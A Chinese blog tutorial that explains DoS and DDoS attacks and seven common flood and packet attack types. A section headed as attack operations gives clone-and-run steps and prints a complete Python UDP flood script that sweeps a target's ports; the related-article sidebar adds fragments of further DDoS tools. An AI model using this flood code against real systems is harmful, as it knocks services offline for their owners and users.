DDOS攻击

最新推荐文章于 2024-06-12 09:40:58 发布
最新推荐文章于 2024-06-12 09:40:58 发布
阅读量838 收藏 2
点赞数
分类专栏: 安全 文章标签: ddos 拒绝服务攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leiwuhen92/article/details/131889339
版权

一、DOS VS DDOS

Dos是拒绝服务攻击,而DDOS(Distribution Denial of service)是分布式拒绝服务攻击;Dos与DDOS都是攻击目标服务器、网络服务的一种手段。
  
区别:
  • DOS是利用自己的计算机攻击目标,是一对一的关系;
  • DDOS是DOS攻击基础上产生的一种新的攻击方式,利用控制成百上千台肉鸡,组成一个DDOS攻击集群,同一时刻对目标发起攻击。
    
原理
    理论上,无论目标服务器、网络服务的资源多大,也是带宽、内存、CPU多大,都无法避免Dos与DDOS攻击,因此任何资源再大也有一个极限值,
比如说,一台服务器每秒可以处理1000个数据包,而通过DOS攻击给这台服务器发送1001个数据包,这时服务器无法正常运行,需要给服务器扩容。
从技术上来说,DOS和DDOS都是攻击目标服务器的带宽和连通性,使得目标服务器的带宽资源耗尽,无法正常运行
  
 

二、被 DDoS 攻击时的现象

  • 靶机上有大量等待的TCP连接
  • 被攻击主机的系统资源被大量占用,造成系统停顿;
  • 网络中存在大量的无用数据包,源地址为假
  • 制造高流量无用数据,造成网络堵塞,使靶机无法与外界通讯、无法及时处理请求
  • 严重时造成系统死机

三、DDOS 常见的七种攻击方式

1、Synflood---目前最流行的 DDoS 攻击手段
    该攻击以多个随机的源主机地址向目的主机发送SYN包,而收到目的主机的SYN ACK后源主机不回应这样目的主机就为这些源主机建立大量的连接队列,而且由于没有收到 ACK 一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。
  
2、Smurf
    该攻击向一个子网的广播地址发一个带有特定请求的包(如ICMP回应请求),并且将源地址伪装成想要攻击的主机地址。子网上的所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。
 
3、Land-based
    攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过 IP 欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。
 
4、Ping of Death
    根据 TCP/IP 的规范,一个包的长度最大为 65536 字节。尽管一个包的长度不能超过 65536 字节,但是一个包分成的多个片段的叠加却能做到。当一个主机收到了长度大于 65536 字节的包时,就是受到了 Ping of Death 攻击,该攻击会造成主机的宕机。
  
5.Teardrop
    IP 数据包在网络传递时,数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现 TearDrop 攻击。第一个包的偏移量为 0,长度为 N,第二个包的偏移量小于 N。为了合并这些数据段,TCP/IP 堆栈会分配超乎寻常的巨大资源,从而造成系统资源的缺乏甚至机器的重新启动。
 
6.PingSweep
    使用 ICMP Echo 轮询多个主机。
 
7.Pingflood:
    该攻击在短时间内向目的主机发送大量 ping 包,造成网络堵塞或主机资源耗尽。

四、攻击操作

1、github下载攻击代码:git clone https://github.com/Ha3MrX/DDos-Attack
2、进入DDos-Attack目录,给ddos-attack.py设置权限:chmod +x ddos-attack.py
3、运行:python ddos-attack.py,需要输入被攻击端的IP、端口号,然后回车,攻击开始:
  
如下代码,用来访问靶机,轮询访问靶机所有端口,发送字节流,造成靶机端口被占用,达到DDOS攻击的目的。
ddos-attack.py: 
import os
import time
import socket
import random

##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
byte = random._urandom(1490) # 字节流
##############

os.system("clear")
os.system("DDOS Attack Starting")
ip = input("IP Target : ")
port = int(input("Port Target : "))  # 起始端口

time.sleep(3)
sent = 0
while True:
    sock.sendto(byte, (ip, port))
    sent += 1
    port += 1
    print("对 %s 攻击 %s 次, port:%s" % (ip, sent, port))
    if port == 65534:
        port = 1
python3运行后,再访问你输入目标IP的那台靶机,抓包分析如下:

五、参考

青霄
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DDOS拒绝服务攻击
weixin_50342860的博客
09-16 792
笔记一、网络访问简化过程二、DOS攻击DDOS攻击的区别1.DOS攻击2.DDOS攻击三、DDOS攻击手法1.ICMP洪水攻击2.UDP洪水攻击3.TCP泛洪:四、DDOS防御手法1. 网络设备IP过滤2.分布式过滤3.CDN技术4.流量清洗 一、网络访问简化过程 客户端通过网络线路向远程的服务器请求内容 服务器按照客户端的需求、查询、计算出相应的数据,再通过网络线路反送给客户端,而两端(或者是互联网)的流转依靠是以TCP/IP协议为核心的通信系统。 二、DOS攻击DDOS攻击的区别 通过占用网络
DDOS流量攻击
热门推荐
一凡凡凡人的博客
10-31 1万+
实验目的 学习基本的DDOS工具使用 hping3 netsniffer – trafgen 实验环境 包含2台主机 attact 作为攻击方,使用Centos7.2 windows_server ,用于被攻击,同时抓包分析流量 ,任意版本均可。安装wireshark,用于抓包 实验步骤 使用hping hping官网帮助信息 hpingping的区别:典型的ping程序使用的是ICMP回显...
Linux网络命令之 `Hping3`
有理论,有实验,有结论,可为一篇文章
08-17 8063
用法: hping3 host [options] -h --help 显示帮助 -v --version 显示版本 -c --count 发送数据包的数目 -i --interval 发送数据包间隔的时间 (uX即X微秒, 例如: -i u1000) --fast 等同 -i u1000...
DDos-Attack Windows/Linux攻击方法-简介
m0_73135216的博客
06-19 1126
ddos-attack攻击
推荐项目:DDos-Attack - 强大的分布式拒绝服务攻击模拟工具
最新发布
gitblog_00060的博客
06-12 399
推荐项目:DDos-Attack - 强大的分布式拒绝服务攻击模拟工具 项目地址:https://gitcode.com/ProgrammerGaurav/DDos-Attack 1、项目介绍 DDos-Attack 是一个简单易用的分布式拒绝服务DDoS攻击模拟工具。它让黑客新手也能理解并尝试这种网络攻击方式,通过大量流量淹没目标网站,使其无法正常服务。这个工具的设计目的是教育和研究,而不是...
hping3 Syntax
maimang1001的专栏
06-21 211
hping3 Syntax | Pablo Gallardo's Bloghttps://diarium.usal.es/pmgallardo/2020/10/16/hping3-syntax/by Pmgallardo on 16 OCTOBER 2020 in IT, NETWORKS, OPERATING SYSTEMSHping performs an ICMP ping scan by specifying the argument -1 on the command line. You may
Python Ddos攻击代码
Reaper ghost的博客
10-05 1626
这是一个用Python编写的简单的DDoS攻击源码。该代码通过创建一个UDP套接字并发送大量随机数据包到指定的IP地址和端口号来实现DDoS攻击攻击大小可以通过更改"bytes"变量中的数字来调整。不过我建议大家不要拿去做坏事哈!如果大家不知道你要测压的网站的ip是什么,可以像这样1.打开命令提示符然后你会看到如下的状态2.输入ping 网址我这里ping的是搜狗浏览器的ip,你们的自己修改。注意!要去掉"https://"或"http://",后面不能留有"/"3.按下回车键,你就会看到如下状态。
linux hping3命令,hping3命令 – 测试网络及主机的安全
weixin_39576149的博客
05-09 175
hping3命令是用于生成和解析TCPIP协议数据包的开源工具,也是安全审计、防火墙测试等工作的标配工具 。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。语法格式:hping3 [参数]常用参数:-c发送数据包的次数-m设置TCP序列数-v版本信息-I网卡接口参考实例对目标端口扫描:[root@linux...
DDos-Attack攻击器教程(kali linux)
小陈的日常生活
06-22 1万+
这个攻击器全部是由python编写的 1.配置环境 首先你需要一台电脑(废话!没电脑我还学个P)好了,开玩笑的嘻嘻 你需要一个kali linunx 当然VM也可以 2.复制我的DDos-Attack工具 (1)打开Kali linunx终端 (2)输入:git clone https://github.com/xhs753/DDos-Attack (3)等待几秒 (4)输入:cd DDoS-Attack-Guy进入到这个目录中 (5)输入:chmod +x attack-guy.py命令赋予其权限 (6)
防御DDoS攻击实用指南 守住你的网站
09-30
DDoS攻击,全称为分布式拒绝服务攻击,是网络世界中的一种恶性攻击手段,近年来随着互联网带宽的增长和黑客工具的普及,其发生频率显著上升。DDoS攻击的主要目的是通过大量合法或看似合法的网络流量淹没目标服务器,...
DDoS攻击方式及防御方法分析研究
08-29
近年来互联网络越来越普及,也越来越多的企业体系利用互联网络来做商业交易,对于一般使用者来说,电子商务更是方便又省时。但是互联网络与电子商务强力发展的背后,许许多多的安全问题便慢慢的浮现出来。...
云环境中基于SDN的高效DDoS攻击检测与防御方案
01-14
针对云环境中2类典型的分布式拒绝服务DDoS攻击问题,提出一种基于软件定义网络架构的DDoS攻击检测与防御方案——SDCC。SDCC综合使用链路带宽和数据流这2种检测方式,利用基于置信度过滤(CBF)的方法计算数据...
2021年第2季度DDoS攻击资源分析报告.pdf
09-02
2021年第二季度的DDoS攻击资源分析报告由国家计算机网络应急技术处理协调中心(CNCERT)发布,详细揭示了这一时期内DDoS攻击的态势和特征。 报告首先定义了攻击资源的关键组成部分: 1. **控制端资源**:这是DDoS...
什么是DDos攻击?.docx
09-06
DDoS 攻击是一种恶意行为,通过大规模互联网流量淹没目标服务器或其周边基础设施,以破坏目标服务器、服务或网络正常流量。DDoS 攻击通过连接互联网的计算机网络进行,利用恶意软件感染的机器人(僵尸)网络发动攻击...
php的ddos攻击解决方法
01-21
本文实例讲述了php的ddos攻击解决方法。分享给大家供大家参考。具体分析如下: 今天自己的一台机器突然向外部发送大量数据包,可每秒到1G以上,虽然我用策略把UDP禁止包是发不出去但是很占cup啊,所以想到最后还是想...
DDos攻击防范技术.docx
09-06
DDoS 攻击防范技术 DDoS(Distributed Denial of Service)攻击是一种常见的网络攻击,它通过大量的虚拟机或僵尸网络对目标服务器或网络进行攻击,导致服务器或网络瘫痪。因此,DDoS 攻击防范技术是网络安全中非常...
hping3
weixin_34414196的博客
01-08 1026
hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle ...
Python实现DDos攻击实例详解
2301_80240808的博客
11-27 3050
SYN泛洪攻击是一种比较常用的Dos方式之一。通过发送大量伪造的 TCP 连接请求,使被攻击主机资源耗尽(通常是 CPU 满负荷或内存不足)的攻击方式。我们都知道建立 TCP 连接需要三次握手。正常情况下客户端首先向服务器端发送SYN报文,随后服务端返回以SYN+ACK报文,最后客户端向服务端发送ACK报文完成三次握手
ddos攻击代码
hello_simon的专栏
03-10 8647
<?php //设置脚本运行时间 set_time_limit(999999); //攻击目标服务器ip $host = $_GET['host']; //攻击目标服务器端口 $port = $_GET['port']; //攻击时长 $exec_time = $_GET['time']; //每次发送字节数 $Sendlen = 65535; $packets = 0; //设置客户机断开不终止
kali ddos攻击
09-20
Kali Linux是一款流行的渗透测试和网络安全工具的发行版。DDoS(分布式拒绝服务攻击是一种恶意行为,旨在通过将大量流量发送到目标服务器或网络来耗尽其资源,使其无法正常工作。在Kali Linux上发动DDoS攻击需要安装适当的工具和脚本。 一个常用的DDoS攻击工具是BoNeSi(Basic Network Stresser),它是一个DDoS僵尸网络模拟器。在Kali Linux上安装BoNeSi需要安装以下依赖包:libpcap-dev(Debian系统)或libpcap-devel(CentOS / RHEL系统)和libnet-dev(Debian系统)或libnet-devel(CentOS / RHEL系统)。安装完成后,你可以使用BoNeSi来模拟DDoS攻击。 另一个进行DDoS攻击的方法是使用第三方工具,如DDos-Attack。你可以使用以下命令在Kali Linux上安装DDos-Attack: Bash git clone https://github.com/Ha3MrX/DDos-Attack 请注意,DDoS攻击是非法的,并且违反了网络道德和法律法规。使用这些工具来攻击他人的网络是严重违法行为,会导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值